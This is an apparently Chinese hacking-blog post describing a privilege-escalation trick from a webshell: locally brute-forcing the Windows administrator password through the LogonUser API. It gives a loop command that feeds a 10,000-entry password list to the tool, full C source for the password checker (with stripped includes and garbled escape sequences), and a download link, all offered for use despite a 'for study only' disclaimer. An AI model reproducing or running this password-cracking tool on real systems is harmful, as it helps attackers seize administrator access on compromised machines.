webshell下的另类提权之3389密码爆破

  • 内容
  • 相关

在土司看到的由x0wolf发布的一个提权新思路觉得不错就收藏过来了。 利用 LogonUser API 模拟用户登陆  判断账号密码登陆成功与否(就是本地爆破) 该种方法不通过网络 速度极快 低权限 (webshell下) 就可以运行 for /f %i in (10k_passwd.txt) do test.exe administrator %i 1w 字典几乎是几秒,缺点就是会产生大量系统登陆日志。 脚本:

#include #include   void help()
 {        
            printf("by x0wolf && lostwolf n");         
            printf("runas user passn");
 }   
int LoginCreateProcess(char* user,char* pass)
 {        
            HANDLE hToken; 
            STARTUPINFOA   si; 
            PROCESS_INFORMATION pi;

             ZeroMemory(&si, sizeof(si));
             ZeroMemory(&pi, sizeof(pi)); 
             si.cb = sizeof(si); 

             if(0 == LogonUser(user, ".", pass, LOGON32_LOGON_INTERACTIVE, LOGON32_PROVIDER_DEFAULT, &hToken))
 {                 
             printf("Failed to call LogonUser FailedNum:%dn",GetLastError());
             return 0;  
  }         
             else
  {                 
             printf("Login Sucessedn"); 
             return 1;
  }
  }   
             int main(int argc,char* argv[])
 {         
             if(argc!=3)
 {                 
             help();                 
             exit(0);         
  }         
             if(argc==3)        
  {                 
             LoginCreateProcess(argv[1],argv[2]);        
  } 
  }

工具下载:https://pan.baidu.com/s/1sl54gUh

本文标签:

版权声明:若无特殊注明,本文皆为《颓废》原创,转载请保留文章出处。

收录状态:[百度已收录] | [360已收录] | [搜狗已收录]

本文链接:webshell下的另类提权之3389密码爆破 - https://www.0dayhack.com/post-726.html

严重声明:本站内容来自于互联网,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规,黑客不是骇客,黑客维护网络安全

发表评论

电子邮件地址不会被公开。 必填项已用*标注